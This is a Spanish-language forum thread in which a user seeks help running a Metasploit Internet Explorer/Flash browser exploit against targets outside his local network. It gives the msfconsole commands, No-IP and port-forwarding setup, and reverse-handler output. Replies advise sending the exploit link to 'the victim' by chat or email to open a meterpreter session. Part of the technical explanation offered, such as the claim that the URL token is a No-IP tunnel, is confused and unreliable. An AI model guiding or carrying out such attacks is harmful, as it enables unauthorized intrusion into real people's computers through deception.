Hola, bueno escribo este post por la siguiente rason, he estado intentando aprender como hacer un ataque fuera de mi Red Local con Metasploit, ya busque información por muchos lados y encontré muy buen material pero solo te enseñan ha hacer el ataque dentro de tu Red local.... con lo cual no tengo ningún problema he podido hacerlo con éxito dentro de entornos virtualizados con Windows Xp y Windows 7, pero respecto a hacerlo fuera de la Red Local no he encontrado material bueno....
para no hacerlo muy largo pondré las características de como lo he estado intentando llevar a cabo:
- Utilizo Kali linux en su ultima versión.
- Utilizo Metasploit
-Utilizo el Exploit para internet Explorer de Adobe Flash player:
windows/browser/adobe_flash_worker_byte_array_uaf (tambien he intentado con otros)
-Utilizo No-ip
-Configure el No-ip en Kali linux
-Agrege la No-ip a DDNS en mi Módem Residencial HG532e de infinitum.
-Abri los puertos 8080 y 4444
Configuro el Exploit de la siguiente manera:
msf > use exploit/windows/browser/adobe_flash_worker_byte_array_uaf
msf exploit(adobe_flash_worker_byte_array_uaf) >
set LHOST (mi Host No-ip) set LPORT (4444)
Exploit.....
como resultado me arroja lo siguiente:
msf exploit(adobe_flash_worker_byte_array_uaf) > exploit
[ * ] Exploit running as background job.
[ * ] Started reverse handler on 192.157.1.32:4444
msf exploit(adobe_flash_worker_byte_array_uaf) > [ * ] Using URL: http://0.0.0.0:8080/5VTw4Ft
[ * ] Local IP: http://192.157.1.32:8080/5VTw4Ft
[ * ] Server started.
perdonen mi ignorancia pero ¿no debería de aparecer mi no-ip en URL a usar?
¿Que estoy haciendo mal?
Agradecería mucho sus comentarios y ayuda.... tengo barios meses intentando lograr este tipo de ataque sin ningún éxito.
Saludos hermano,
Me parece que NoIP te da una direccion (generalmente es un nombre de dominio) para que puedas usarla y configurarla en los fines que necesites, pero internamente manejan las direcciones asignando una direccion que aplicque para "cualquier conexion" sin importar la IP que tengas asignada en ese momento, por ejemplo 0.0.0.0 que desde el punto de vista de enrutamiento significa "cualquier direccion".
En resumen la URL que usa el exploit (la que te marque en rojo) no es mas que el mismo nombre de dominio que configuraste al exploit (zapdo.XXXX:1234)
[ * ] Started reverse handler on 192.157.1.32:4444
msf exploit(adobe_flash_worker_byte_array_uaf) > [ * ] Using URL: http://0.0.0.0:8080/5VTw4Ft
[ * ] Local IP: http://192.157.1.32:8080/5VTw4Ft
[ * ] Server started.
Luego si te fijas en la direccion del dominio y tu dirección IP privada veras que al final ambas finalizan con "5VTw4Ft" esto es algo asi como "una sesion" como una forma de "tuneling" entre tu y el servidor de No-IP que te brinda el servicio.
Saludos por alla, cualquier duda estamos a tus ordenes hermano.
bueno entonces lo estoy haciendo bien?
y si es así... cual de los 2 lincks es el que tiene que pincharse para obtener la sesión abierta?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
y si es así... cual de los 2 lincks es el que tiene que pincharse para obtener la sesión abierta?
No entendi... :-\
A que te refieres con pincharse?
Saludos.
hehe perdón, seré mas claro..... me refería al linck que le tienes que mandar a la víctima para que le pincheo habrá o le de clic...... y al darle me habré una sesión en metasploit...
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
hehe perdón, seré mas claro..... me refería al linck que le tienes que mandar a la víctima para que le pincheo habrá o le de clic...... y al darle me habré una sesión en metasploit...
Via chat, mail u otra forma deberías enviarle el link con el nombre de dominio de NO-IP.
Aunque me asalta una duda, no estoy totalmente seguro pero pensando un poco me parece que deberías redireccionar el puerto 8080 hacia el 4444 para lograr la sesión, ya que la victima te hará una petición por el puerto 8080, pero internamente tu meterpreter esta esperando por el puerto 4444, como dije anteriormente no estoy totalmente seguro ya que es posible que NAT haga el "translation" automaticamente.
Saludos por alla hermano.